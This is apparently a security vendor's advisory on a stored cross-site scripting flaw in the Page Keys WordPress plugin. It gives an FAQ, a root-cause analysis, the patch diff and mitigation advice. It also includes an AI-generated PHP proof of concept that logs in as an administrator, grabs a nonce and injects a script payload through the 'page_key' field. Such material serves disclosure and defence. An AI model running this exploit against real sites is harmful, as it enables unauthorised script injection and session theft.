What is CVE-2025-15000?

CVE-2025-15000 is a stored cross-site scripting (XSS) vulnerability in the Page Keys plugin for WordPress, affecting versions up to and including 1.3.3. It allows authenticated administrators to inject arbitrary JavaScript through the ‘page_key’ parameter, which executes when users access affected pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin. An attacker with administrator access can submit a malicious script in the ‘page_key’ field, which is then stored in the database and executed in the context of users visiting the compromised page.

Who is affected by this vulnerability?

Only WordPress installations using the Page Keys plugin version 1.3.3 or earlier are affected, specifically in multisite environments or where the ‘unfiltered_html’ capability is disabled. Administrators with access to the plugin settings are the primary risk group.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Page Keys plugin installed on your WordPress site. If it is version 1.3.3 or earlier, and your site is a multisite or has ‘unfiltered_html’ disabled, it is at risk.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Page Keys plugin to version 1.3.4 or later, where the issue has been patched. Regularly check for updates to all plugins and themes to maintain site security.

What does a CVSS score of 4.4 indicate?

A CVSS score of 4.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk if exploited. It requires authenticated access, limiting the potential attack surface.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can allow attackers to execute scripts in the context of authenticated users, potentially leading to session hijacking, data theft, or site defacement. The impact can be severe, especially in multi-user environments.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the Page Keys plugin until a patch can be applied. Additionally, review user roles to limit access to trusted administrators only.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can log into a vulnerable WordPress site and submit a malicious JavaScript payload through the Page Keys settings. This illustrates the ease of exploitation given administrator access.

What is the importance of input sanitization?

Input sanitization is crucial in preventing vulnerabilities like XSS. It ensures that user inputs are properly cleaned and validated before being processed or displayed, thereby mitigating the risk of executing malicious scripts.

What is stored cross-site scripting (XSS)?

Stored cross-site scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then stored and served to users. This type of XSS can persist over time, affecting all users who access the compromised content.

How can I enhance my site's security against such vulnerabilities?

Enhance your site’s security by regularly updating all themes and plugins, using security plugins that monitor for vulnerabilities, enforcing strong password policies, and limiting user permissions to only what is necessary.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-15000: Page Keys <= 1.3.3 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'page_key' Parameter (page-keys)

CVE ID CVE-2025-15000

Plugin page-keys

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 1.3.3

Patched Version 1.3.4

Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15000:
The Page Keys WordPress plugin version 1.3.3 and earlier contains an authenticated stored cross-site scripting (XSS) vulnerability. This vulnerability allows administrators to inject arbitrary JavaScript via the ‘page_key’ parameter. The injected script executes when any user views an affected page. The vulnerability only affects WordPress multisite installations or installations where the ‘unfiltered_html’ capability is disabled.

Atomic Edge research identifies the root cause in the plugin’s insufficient input sanitization and output escaping for the ‘page_key’ parameter. The vulnerability exists in the `single_row()` method within the `ListTable` class (file: page-keys/inc/ListTable.php). The method directly outputs the `$page_key` variable without proper escaping in line 261 of the vulnerable version. The `$page_key` value originates from user input processed through the plugin’s settings form and stored in the WordPress options table.

The exploitation method requires an authenticated attacker with administrator-level access. The attacker navigates to the Page Keys settings page at /wp-admin/edit.php?post_type=page&page=page-keys. They submit a malicious JavaScript payload within the ‘page_key’ field during page key creation or editing. The payload persists in the WordPress database. When any user visits a page mapped to the malicious page key, the JavaScript executes in the victim’s browser context.

The patch addresses the vulnerability through multiple changes. The primary fix adds `esc_attr()` output escaping for the `$page_key` variable in line 261 of page-keys/inc/ListTable.php. The patch also introduces input sanitization using `sanitize_key()` in the `delete()` method of the `PageKeys` model (line 128) and the `save()` method of the `Settings` model (line 48). These changes ensure the page_key parameter contains only alphanumeric characters, underscores, and hyphens before storage and during retrieval.

Successful exploitation enables attackers to perform actions within the context of authenticated users. This includes stealing session cookies, performing administrative actions, redirecting users to malicious sites, or defacing websites. The stored nature means the payload executes for all users accessing the compromised page until the malicious entry is removed. The requirement for administrator access limits the attack surface to compromised admin accounts or insider threats.

Differential between vulnerable and patched code

Code Diff

--- a/page-keys/functions.php
+++ b/page-keys/functions.php
@@ -1,7 +1,11 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 use tfPageKeysModelsOption;

+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
 if ( ! function_exists( 'get_page_by_key' ) ) :

 	/**
--- a/page-keys/inc/Autoloader/Autoloader.php
+++ b/page-keys/inc/Autoloader/Autoloader.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfAutoloader;

--- a/page-keys/inc/Autoloader/NamespaceRule.php
+++ b/page-keys/inc/Autoloader/NamespaceRule.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfAutoloader;

--- a/page-keys/inc/Autoloader/Rule.php
+++ b/page-keys/inc/Autoloader/Rule.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfAutoloader;

--- a/page-keys/inc/Autoloader/bootstrap.php
+++ b/page-keys/inc/Autoloader/bootstrap.php
@@ -1,7 +1,11 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfAutoloader;

+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
 foreach ( array( 'Autoloader', 'Rule', 'NamespaceRule' ) as $name ) {
 	$fqn = __NAMESPACE__ . '\' . $name;
 	if ( ! class_exists( $fqn ) && ! interface_exists( $fqn ) ) {
--- a/page-keys/inc/Controllers/AJAX.php
+++ b/page-keys/inc/Controllers/AJAX.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysControllers;

--- a/page-keys/inc/Controllers/AdminNotice.php
+++ b/page-keys/inc/Controllers/AdminNotice.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysControllers;

--- a/page-keys/inc/Controllers/Page.php
+++ b/page-keys/inc/Controllers/Page.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysControllers;

--- a/page-keys/inc/Controllers/Script.php
+++ b/page-keys/inc/Controllers/Script.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysControllers;

--- a/page-keys/inc/Controllers/Settings.php
+++ b/page-keys/inc/Controllers/Settings.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysControllers;

--- a/page-keys/inc/Controllers/TextDomain.php
+++ b/page-keys/inc/Controllers/TextDomain.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysControllers;

--- a/page-keys/inc/ListTable.php
+++ b/page-keys/inc/ListTable.php
@@ -1,8 +1,7 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeys;

-use tfPageKeysModels;
 use tfPageKeysModelsSettingsPage as PageModel;

 require_once ABSPATH . 'wp-admin/includes/class-wp-list-table.php';
@@ -139,6 +138,8 @@
 	/**
 	 * Sort the items according to the values given in the $_REQUEST superglobal.
 	 *
+	 * @phpcs:disable WordPress.Security.NonceVerification.Recommended -- No nonce verification needed.
+	 *
 	 * @param array $sortable_columns Sortable columns.
 	 *
 	 * @return void
@@ -147,14 +148,14 @@

 		if (
 			empty( $_REQUEST[ 'orderby' ] )
-			|| ! array_key_exists( $_REQUEST[ 'orderby' ], $sortable_columns )
+			|| ! array_key_exists( sanitize_text_field( wp_unslash( $_REQUEST[ 'orderby' ] ) ), $sortable_columns )
 		) {
 			return;
 		}

 		if (
 			isset( $_REQUEST[ 'order' ] )
-			&& strtolower( $_REQUEST[ 'order' ] ) === 'desc'
+			&& strtoupper( sanitize_text_field( wp_unslash( $_REQUEST[ 'order' ] ) ) ) === 'DESC'
 		) {
 			krsort( $this->items );
 		} else {
@@ -170,7 +171,7 @@
 	private function maybe_add_item() {

 		if (
-			filter_input( INPUT_GET, 'action' ) === 'add'
+			filter_input( INPUT_GET, 'action', FILTER_SANITIZE_SPECIAL_CHARS ) === 'add'
 			&& $this->page->current_user_can( 'edit' )
 		) {
 			$this->items[ ] = $this->get_empty_item();
@@ -214,7 +215,7 @@
 	 */
 	public function single_row( $item ) {

-		$id = time() . mt_rand();
+		$id = time() . wp_rand();
 		$id = md5( $id );
 		$this->current_row_id = substr( $id, 0, 15 );

@@ -257,14 +258,14 @@
 			'<input type="text" name="%1$s[%2$s][page_key]" value="%3$s" class="page-key regular-text" data-id="%2$s">',
 			$this->name_prefix,
 			$this->current_row_id,
-			$page_key
+			esc_attr( $page_key )
 		);

 		$actions = array();
 		if ( $this->page->current_user_can( 'edit' ) ) {
-			$text = esc_html__( 'Edit' );
+			$text = esc_html__( 'Edit', 'page-keys' );
 			$url = get_permalink();
-			$title = esc_attr__( 'Edit this item' );
+			$title = esc_attr__( 'Edit this item', 'page-keys' );
 			$actions[ 'edit hide-if-no-js' ] = sprintf(
 				'<a class="edit" title="%3$s" href="%2$s">%1$s</a>',
 				$text,
@@ -272,9 +273,9 @@
 				$title
 			);

-			$text = esc_html__( 'Delete Permanently' );
-			$url = $this->page->get_delete_page_key_url( $page_key );
-			$title = esc_attr__( 'Delete this item permanently' );
+			$text = esc_html__( 'Delete Permanently', 'page-keys' );
+			$url = esc_url( $this->page->get_delete_page_key_url( $page_key ) );
+			$title = esc_attr__( 'Delete this item permanently', 'page-keys' );
 			$actions[ 'delete' ] = sprintf(
 				'<a class="submitdelete submitdelete-%4$s" title="%3$s" href="%2$s" data-id="%4$s">%1$s</a>',
 				$text,
@@ -307,11 +308,11 @@

 		return wp_dropdown_pages(
 			array(
-				'name'             => $this->name_prefix . '[' . $this->current_row_id . '][page_id]',
-				'id'               => 'page-id-' . $this->current_row_id,
+				'name'             => esc_attr( $this->name_prefix . '[' . $this->current_row_id . '][page_id]' ),
+				'id'               => esc_attr( 'page-id-' . $this->current_row_id ),
 				'show_option_none' => ' ',
 				'option_non_value' => '',
-				'selected'         => $selected,
+				'selected'         => esc_attr( $selected ),
 				'echo'             => FALSE,
 			)
 		);
--- a/page-keys/inc/Models/Nonce.php
+++ b/page-keys/inc/Models/Nonce.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModels;

@@ -110,7 +110,8 @@
 				return FALSE;
 			}

-			$nonce = $_REQUEST[ $this->name ];
+			/* phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Nonce verification further down. */
+			$nonce = sanitize_key( $_REQUEST[ $this->name ] );
 		}

 		$action = $action === '' ? $this->action : $action;
--- a/page-keys/inc/Models/Option.php
+++ b/page-keys/inc/Models/Option.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModels;

--- a/page-keys/inc/Models/Page.php
+++ b/page-keys/inc/Models/Page.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModels;

@@ -39,7 +39,7 @@
 		foreach ( $pages as $page_key => $page ) {
 			if (
 				isset( $page[ 'page_id' ] )
-				&& $page[ 'page_id' ] == $post_id
+				&& absint( $page[ 'page_id' ] ) === absint( $post_id )
 			) {
 				$pages[ $page_key ][ 'page_id' ] = '';
 				$update = TRUE;
--- a/page-keys/inc/Models/PageKeys.php
+++ b/page-keys/inc/Models/PageKeys.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModels;

@@ -88,7 +88,7 @@
 		$data = (object) compact( 'errors' );

 		if ( $response ) {
-			$data->id = filter_input( INPUT_POST, 'id' );
+			$data->id = filter_input( INPUT_POST, 'id', FILTER_SANITIZE_SPECIAL_CHARS );
 			wp_send_json_success( $data );
 		}

@@ -98,6 +98,8 @@
 	/**
 	 * Delete the page key given in the $_REQUEST superglobal.
 	 *
+	 * @phpcs:disable WordPress.Security.NonceVerification.Recommended -- Nonce verification via Nonce::is_valid().
+	 *
 	 * @return bool
 	 */
 	private function delete() {
@@ -123,7 +125,7 @@
 			return FALSE;
 		}

-		$page_key = urldecode( $_REQUEST[ 'page_key' ] );
+		$page_key = sanitize_key( $_REQUEST[ 'page_key' ] );
 		$pages = Option::get();
 		if ( array_key_exists( $page_key, $pages ) ) {
 			unset( $pages[ $page_key ] );
--- a/page-keys/inc/Models/Script.php
+++ b/page-keys/inc/Models/Script.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModels;

--- a/page-keys/inc/Models/Settings.php
+++ b/page-keys/inc/Models/Settings.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModels;

@@ -45,6 +45,7 @@

 				$page_key = $page[ 'page_key' ];
 			}
+			$page_key = sanitize_key( $page_key );

 			$page_id = '';
 			if ( isset( $page[ 'page_id' ] ) ) {
--- a/page-keys/inc/Models/SettingsErrors/DuplicatePageKey.php
+++ b/page-keys/inc/Models/SettingsErrors/DuplicatePageKey.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModelsSettingsErrors;

@@ -21,9 +21,11 @@

 		$this->set_code( 'duplicate-page-key' );

+		/* translators: 1: page key, 2: page ID. */
 		$message = _x(
-			"Cannot map page key '%s' to page ID '%d'! Page key already set.",
-			'Settings error message, %s=page key, %d=page ID', 'page-keys'
+			'Cannot map page key "%1$s" to page ID %2$d! Page key already set.',
+			'Settings error message',
+			'page-keys'
 		);
 		$message = sprintf( $message, $page_key, $page_id );
 		$this->set_message( $message );
--- a/page-keys/inc/Models/SettingsErrors/InvalidNonce.php
+++ b/page-keys/inc/Models/SettingsErrors/InvalidNonce.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModelsSettingsErrors;

--- a/page-keys/inc/Models/SettingsErrors/InvalidPageKey.php
+++ b/page-keys/inc/Models/SettingsErrors/InvalidPageKey.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModelsSettingsErrors;

@@ -20,7 +20,8 @@

 		$this->set_code( 'invalid-page-key' );

-		$message = _x( "Page key '%s' invalid!", 'Settings error message, %s=page key', 'page-keys' );
+		/* translators: 1: page key. */
+		$message = _x( 'Page key "%s" invalid!', 'Settings error message', 'page-keys' );
 		$message = sprintf( $message, $page_key );
 		$this->set_message( $message );
 	}
--- a/page-keys/inc/Models/SettingsErrors/MissingPageKey.php
+++ b/page-keys/inc/Models/SettingsErrors/MissingPageKey.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModelsSettingsErrors;

--- a/page-keys/inc/Models/SettingsErrors/NoPermissionToEdit.php
+++ b/page-keys/inc/Models/SettingsErrors/NoPermissionToEdit.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModelsSettingsErrors;

@@ -18,7 +18,7 @@

 		$this->set_code( 'no-permission-to-edit' );

-		$message = _x( "You don't have permission to edit page keys.", 'Settings error message', 'page-keys' );
+		$message = _x( 'You don't have permission to edit page keys.', 'Settings error message', 'page-keys' );
 		$this->set_message( $message );
 	}

--- a/page-keys/inc/Models/SettingsErrors/PageKeyDeleted.php
+++ b/page-keys/inc/Models/SettingsErrors/PageKeyDeleted.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModelsSettingsErrors;

@@ -20,7 +20,8 @@

 		$this->set_code( 'page-key-deleted' );

-		$message = _x( "Page key '%s' permanently deleted.", 'Settings error message, %s=page key', 'page-keys' );
+		/* translators: 1: page key. */
+		$message = _x( 'Page key "%s" permanently deleted.', 'Settings error message', 'page-keys' );
 		$message = sprintf( $message, $page_key );
 		$this->set_message( $message );

--- a/page-keys/inc/Models/SettingsErrors/SettingsError.php
+++ b/page-keys/inc/Models/SettingsErrors/SettingsError.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModelsSettingsErrors;

@@ -78,7 +78,7 @@
 			'error',
 			'updated',
 		);
-		if ( ! in_array( $type, $valid_types ) ) {
+		if ( ! in_array( $type, $valid_types, TRUE ) ) {
 			return FALSE;
 		}

--- a/page-keys/inc/Models/SettingsPage.php
+++ b/page-keys/inc/Models/SettingsPage.php
@@ -1,10 +1,7 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModels;

-use tfPageKeysControllers;
-use tfPageKeysViews;
-
 /**
  * Class SettingsPage
  *
@@ -121,7 +118,7 @@
 			'add',
 			'delete',
 		);
-		if ( ! in_array( $action, $valid_actions ) ) {
+		if ( ! in_array( $action, $valid_actions, TRUE ) ) {
 			return '';
 		}

--- a/page-keys/inc/Models/TextDomain.php
+++ b/page-keys/inc/Models/TextDomain.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysModels;

@@ -37,7 +37,7 @@
 	 */
 	public function load() {

-		return load_plugin_textdomain( $this->domain, FALSE, $this->path );
+		return load_plugin_textdomain( $this->domain, false, $this->path );
 	}

 }
--- a/page-keys/inc/Plugin.php
+++ b/page-keys/inc/Plugin.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeys;

--- a/page-keys/inc/Views/AdminNotice.php
+++ b/page-keys/inc/Views/AdminNotice.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysViews;

@@ -59,8 +59,9 @@
 			return;
 		}

-		$error_message = esc_html_x(
-			'%sImportant:%s Not all registered page keys have a page assigned.', '%s = <strong> and </strong>',
+		/* translators: 1: <strong>, 2: </strong>. */
+		$error_message = esc_html__(
+			'%1$sImportant:%2$s Not all registered page keys have a page assigned.',
 			'page-keys'
 		);

@@ -68,7 +69,7 @@
 		?>
 		<div class="error">
 			<p>
-				<?php printf( $error_message, '<strong>', '</strong>' ); ?>
+				<?php echo wp_kses_post( sprintf( $error_message, '<strong>', '</strong>' ) ); ?>
 				<a href="<?php echo esc_url( $link_url ); ?>">
 					<?php echo esc_html_x( 'Assign pages now.', 'Link text in admin notice', 'page-keys' ); ?>
 				</a>
--- a/page-keys/inc/Views/SettingsPage.php
+++ b/page-keys/inc/Views/SettingsPage.php
@@ -1,4 +1,4 @@
-<?php # -*- coding: utf-8 -*-
+<?php

 namespace tfPageKeysViews;

@@ -31,8 +31,6 @@
 	public function __construct( Model $model ) {

 		$this->model = $model;
-
-		$this->title = esc_html_x( 'Page Keys', 'Settings page title', 'page-keys' );
 	}

 	/**
@@ -44,9 +42,10 @@
 	 */
 	public function add() {

+		$title = esc_html_x( 'Page Keys', 'Settings page title', 'page-keys' );
 		$menu_title = esc_html_x( 'Page Keys', 'Menu item title', 'page-keys' );
 		add_pages_page(
-			$this->title,
+			$title,
 			$menu_title,
 			$this->model->get_capability( 'list' ),
 			$this->model->get_slug(),
@@ -70,15 +69,15 @@
 		?>
 		<div class="wrap">
 			<h2>
-				<?php echo $this->title; ?>
+				<?php echo esc_html_x( 'Page Keys', 'Settings page title', 'page-keys' ); ?>
 				<?php if ( $current_user_can_edit ) : ?>
-					<a href="<?php echo $this->model->get_add_page_key_url(); ?>" class="add-new-h2">
-						<?php esc_html_e( 'Add New' ); ?>
+					<a href="<?php echo esc_url( $this->model->get_add_page_key_url() ); ?>" class="add-new-h2">
+						<?php esc_html_e( 'Add New', 'page-keys' ); ?>
 					</a>
 				<?php endif; ?>
 			</h2>
 			<?php settings_errors(); ?>
-			<form action="<?php echo admin_url( 'options.php' ); ?>" method="post" id="page-keys-form">
+			<form action="<?php echo esc_url( admin_url( 'options.php' ) ); ?>" method="post" id="page-keys-form">
 				<?php settings_fields( $option_name ); ?>
 				<?php $list_table->display(); ?>

@@ -88,9 +87,9 @@
 						<p>
 							<?php
 							printf(
-								esc_html_x(
-									'%sWarning%s: Duplicate page keys found!',
-									'%s=<strong> and </strong>',
+								/* translators: 1: <strong>, 2: </strong>. */
+								esc_html__(
+									'%1$sWarning%2$s: Duplicate page keys found!',
 									'page-keys'
 								),
 								'<strong>',
--- a/page-keys/page-keys.php
+++ b/page-keys/page-keys.php
@@ -1,11 +1,11 @@
-<?php # -*- coding: utf-8 -*-
+<?php
 /**
  * Plugin Name: Page Keys
  * Plugin URI:  https://wordpress.org/plugins/page-keys/
- * Description: Register page keys, assign actual WordPress pages to them, and access each of these pages by its individual key.
+ * Description: Register page keys, assign WordPress pages to them, and access each of these pages by its individual key.
  * Author:      Thorsten Frommen
  * Author URI:  https://tfrommen.de
- * Version:     1.3.3
+ * Version:     1.3.4
  * Text Domain: page-keys
  * Domain Path: /languages
  * License:     GPLv3
@@ -15,8 +15,8 @@

 use tfAutoloader;

-if ( ! function_exists( 'add_action' ) ) {
-	return;
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
 }

 require_once __DIR__ . '/inc/Autoloader/bootstrap.php';

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15000 - Page Keys <= 1.3.3 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'page_key' Parameter

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'admin';
$password = 'password';
$payload = '"><script>alert(document.domain)</script>';

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute login and capture cookies
$response = curl_exec($ch);

// Navigate to Page Keys settings page to obtain nonce
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/edit.php?post_type=page&page=page-keys');
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);

// Extract nonce from the page (simplified - real implementation would parse HTML)
// The nonce is typically in a hidden input field named '_wpnonce' or similar
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Submit malicious page key via POST to options.php
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/options.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'option_page' => 'page_keys',
    'action' => 'update',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/edit.php?post_type=page&page=page-keys',
    'page_keys' => [
        'new_row_id' => [
            'page_key' => $payload,
            'page_id' => '1'  // Map to existing page ID
        ]
    ]
]));

$response = curl_exec($ch);

// Verify success by checking response or visiting the page
curl_setopt($ch, CURLOPT_URL, $target_url . '/?page_key=' . urlencode($payload));
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);

if (strpos($response, $payload) !== false) {
    echo "XSS payload successfully injected.n";
} else {
    echo "Injection may have failed.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-15000?
Overview of the vulnerability
CVE-2025-15000 is a stored cross-site scripting (XSS) vulnerability in the Page Keys plugin for WordPress, affecting versions up to and including 1.3.3. It allows authenticated administrators to inject arbitrary JavaScript through the ‘page_key’ parameter, which executes when users access affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin. An attacker with administrator access can submit a malicious script in the ‘page_key’ field, which is then stored in the database and executed in the context of users visiting the compromised page.
Who is affected by this vulnerability?
Identifying impacted users
Only WordPress installations using the Page Keys plugin version 1.3.3 or earlier are affected, specifically in multisite environments or where the ‘unfiltered_html’ capability is disabled. Administrators with access to the plugin settings are the primary risk group.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the Page Keys plugin installed on your WordPress site. If it is version 1.3.3 or earlier, and your site is a multisite or has ‘unfiltered_html’ disabled, it is at risk.
How can I fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Page Keys plugin to version 1.3.4 or later, where the issue has been patched. Regularly check for updates to all plugins and themes to maintain site security.
What does a CVSS score of 4.4 indicate?
Understanding severity levels
A CVSS score of 4.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk if exploited. It requires authenticated access, limiting the potential attack surface.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability can allow attackers to execute scripts in the context of authenticated users, potentially leading to session hijacking, data theft, or site defacement. The impact can be severe, especially in multi-user environments.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If you cannot update the plugin immediately, consider disabling the Page Keys plugin until a patch can be applied. Additionally, review user roles to limit access to trusted administrators only.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept provided shows how an attacker can log into a vulnerable WordPress site and submit a malicious JavaScript payload through the Page Keys settings. This illustrates the ease of exploitation given administrator access.
What is the importance of input sanitization?
Preventing vulnerabilities
Input sanitization is crucial in preventing vulnerabilities like XSS. It ensures that user inputs are properly cleaned and validated before being processed or displayed, thereby mitigating the risk of executing malicious scripts.
What is stored cross-site scripting (XSS)?
Definition and implications
Stored cross-site scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then stored and served to users. This type of XSS can persist over time, affecting all users who access the compromised content.
How can I enhance my site's security against such vulnerabilities?
Best practices for WordPress security
Enhance your site’s security by regularly updating all themes and plugins, using security plugins that monitor for vulnerabilities, enforcing strong password policies, and limiting user permissions to only what is necessary.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations